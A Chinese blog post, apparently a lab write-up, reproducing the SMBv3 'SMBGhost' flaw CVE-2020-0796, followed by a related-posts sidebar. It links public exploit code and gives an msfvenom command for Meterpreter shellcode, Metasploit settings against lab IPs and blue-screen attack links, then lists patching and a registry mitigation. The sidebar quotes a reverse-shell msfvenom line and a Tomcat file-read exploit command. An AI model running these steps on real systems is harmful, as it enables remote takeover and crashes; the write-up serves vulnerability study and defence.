CVE-2020-0796 - SMBv3漏洞复现与提权

最新推荐文章于 2024-05-08 17:40:54 发布
最新推荐文章于 2024-05-08 17:40:54 发布
阅读量4.7k 收藏 7
点赞数 9
分类专栏: 各种漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangbz123/article/details/106583627
版权

CVE-2020-0796 - SMBv3提权
微软发布安全公告,发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒之黑”,攻击者可以利用漏洞进行提权实现代码执行。

提权准备工作
1、首先下载扫描器,进行检测
下载地址:

https://github.com/ollypwn/SMBGhost

python3 scanner.py <ip>

将Windows目标机的防火墙关闭,让攻击机可以ping通ip
可以看到
在这里插入图片描述
2、下载好可利用的POC

https://github.com/chompie1337/SMBGhost_RCE_PoC

生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.220.150 LPORT=3333 -f python -o test.py

在这里插入图片描述
启动msf
设置payload

set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.220.156
set LPORT 3333

在这里插入图片描述
将test.py中的code替换poc中的code
在这里插入图片描述
在这里插入图片描述
执行刚刚下载好exploit
在这里插入图片描述
执行msf中的payload
在这里插入图片描述
操作
在这里插入图片描述
在这里插入图片描述
蓝屏攻击
蓝屏POC链接

https://github.com/jiansiting/CVE-2020-0796
https://github.com/chompie1337/SMBGhost_RCE_PoC
在这里插入图片描述
在这里插入图片描述

漏洞修补与防范
更新最新补丁关闭危险端口号(445、139)
禁用SMBv 3压缩
您可以禁用压缩以阻止未经身份验证的攻击者利用针对SMBv 3服务器使用下面的PowerShell命令。

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

官方链接

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

参考文章

https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247487340&idx=1&sn=e74c796edeeccbc4be5b1ca66b7cd48f&chksm=fe7a2bf4c90da2e24692d407f7aa7481f440d0a56e2127894d927a9fd2add0de5567b97cdf7e&mpshare=1&scene=23&srcid=060666qUfZADbQpK6EyQF0q0&sharer_sharetime=1591432448856&sharer_shareid=68a0ddd9c9ffcc9062ebb3909d898b9a#rd

bye_X
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_84264010的博客
05-08 883
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2020-0796-Scanner.zip
06-08
CVE-2020-0796批量扫描工具,工具使用说明在压缩保内。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络进行攻击。 建议大家及时将 Weblogic 升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受客攻击。
CVE-2020-0796:CVE-2020-0796-Windows SMBv3 LPE攻击#SMBGhost
03-19
CVE-2020-0796 Windows SMBv3 LPE漏洞利用 作者 丹尼尔·加西亚·古铁雷斯( ) 曼努埃尔·布兰科·帕拉洪( ) 漏洞利用分析 参考
CVE-2020-0796 SMBv3漏洞复现过程
BROTHERYY的博客
10-07 205
1.扫描主机是否存在漏 扫描py文件链接 2.下载可利用的POC poc地址 3.在kali里使用msfvenom生成shell,lhost是攻击机ip msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py 4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换 5.进入msf开启监听 use exploit/mu
Windows—永恒提权(CVE-2020-0796)
oiadkt的博客
03-03 373
Windows—永恒提权(CVE-2020-0796)
微软服务器代码执行漏洞复现,微软SMBv3 ClientServer远程代码执行漏洞CVE-2020-0796...
weixin_36381252的博客
08-12 1690
原标题:微软SMBv3 ClientServer远程代码执行漏洞CVE-2020-0796一、漏洞基本信息1.SMBv3介绍服务器消息块(SMB),是一个网络通信协议,用于提供共享访问到文件,打印机和串行端口的节点之间的网络上。它还提供了经过身份验证的进程间通信机制。SMB的大多数用法涉及运行Microsoft Windows的计算机,在引入Active Directory之前被称为“ Micro...
TRY HACK ME | Skynet「SMB信息搜集+TAR提权
AKAHRZ的博客
05-14 835
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG! THM靶场:Skynet「SMB信息搜集+TAR提权」THM靶场:SkynetSteelmountain 靶场通关小结 THM靶场:Skynet 这个房间是一.
hydra字典破解smb协议及后续提权
wlopghost的博客
03-25 1169
首先先将kali与win-xp设置为同一网段使之两者ping通(在主机上将vmnet1和8都设置为自动获取ip,在虚拟机内将两台虚拟机都设置为桥接模式,此时两台虚拟机都有了一个ip但网段不同,查看kali网段然后手动将win-xp的网段改到和kali一样的网段即可。-e nsr 可选选项,n:空密码试探,s:使用指定用户和密码试探,r:指定密码与用户名相反。-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796复现
box
06-04 1358
容我先吐槽下 没错又是她——smb,windows的wodow。复现了我一天,踩了各种坑。 一、漏洞描述 漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受客攻击的目标系统只需开机在线即可能被入侵。 二、受影响版本 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64
CVE-2020-0796漏洞复现(蓝屏警告)
qq_46258964的博客
09-20 2007
CVE-2020-0796简介 微软3月11日发布3月例行更新,其中并未公布编号为CVE-2020-0796的高危漏洞资料, 但该漏洞却最为引人注目。次日晚(2020年3月12日)微软正式发布CVE-2020-0796高危漏洞补丁。 该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限, WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。 除了直接攻击SMB服务端造成RCE外, 该漏洞得亮点在于对SMB客户端的攻击, 击者可以构造特定的网页,压缩包,
CVE-2020-0796本地提权利用深入分析
weixin_44045581的博客
06-17 675
CVE-2020-0796本地提权利用深入分析前言压缩数据包解析动态分析SrvNetAllocateBuffer函数分析提权方法解析 前言 2020年3月份,微软发布了关于SMBv3协议的远程代码执行漏洞CVE-2020-0796),攻击者可通过发送构造的恶意数据包,执行任意代码。近日网上出现了本地提权利用,借用这个机会,深入分析下漏洞的具体细节。 此漏洞是由于SMB不能正确处理压缩数据包造成的,已确定漏洞存在于文件srv2.sys中。srv2.sys中处理压缩包数据的函数srv2!Srv2Decompr
linux运行fuzzbunch,方程式0day ETERNALBLUE复现之Empire &ampamp; Msfconsole下的she...
weixin_29292431的博客
05-10 160
在本文中我将为大家复现在前段时间被曝出的,方程式0day Eternalblue的利用过程。Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞。从涵盖的操作系统版本来看,Eternalblue针对的范围也非常广泛。从Windows XP到Windows Server 2012都为其攻击对象。而Windows 10和Windows Server 2016,...
cve-2020-0796_SMB远程代码执行漏洞CVE20200796复现
weixin_39997795的博客
11-30 747
01 概述Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。SMB远程代码执行漏洞CVE-2020-0796,攻击者可以利用此漏洞远程无需用户验证通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制。这几天尝...
赛虎学院信息安全: SMB远程代码执行漏洞 CVE-2020-0796 复现与分析
saihuxueyuan的博客
05-27 694
一、前言 2020年3月10日,自思科talos泄露了一个微软smb v3.1协议漏洞,随即在3月12日,微软公布了紧急修复补丁。 该漏洞编号为CVE-2020-0796,名称为“smbghost”。是一个针对Windows的 SMBv3 客户端与服务端远程代码执行漏洞。其漏洞原理是Microsoft服务器消息块3.1.1(即SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。SMB 3.1.1协议中处理压缩消息时,对其中数据
CVE-2020-0796 漏洞复现
迷风小白
06-05 3213
0x00 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 0x01
Tomact_CVE-2020-1938漏洞复现
08-31
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 复现漏洞:使用以下命令触发漏洞复现: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你复现Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞复现时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞复现](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值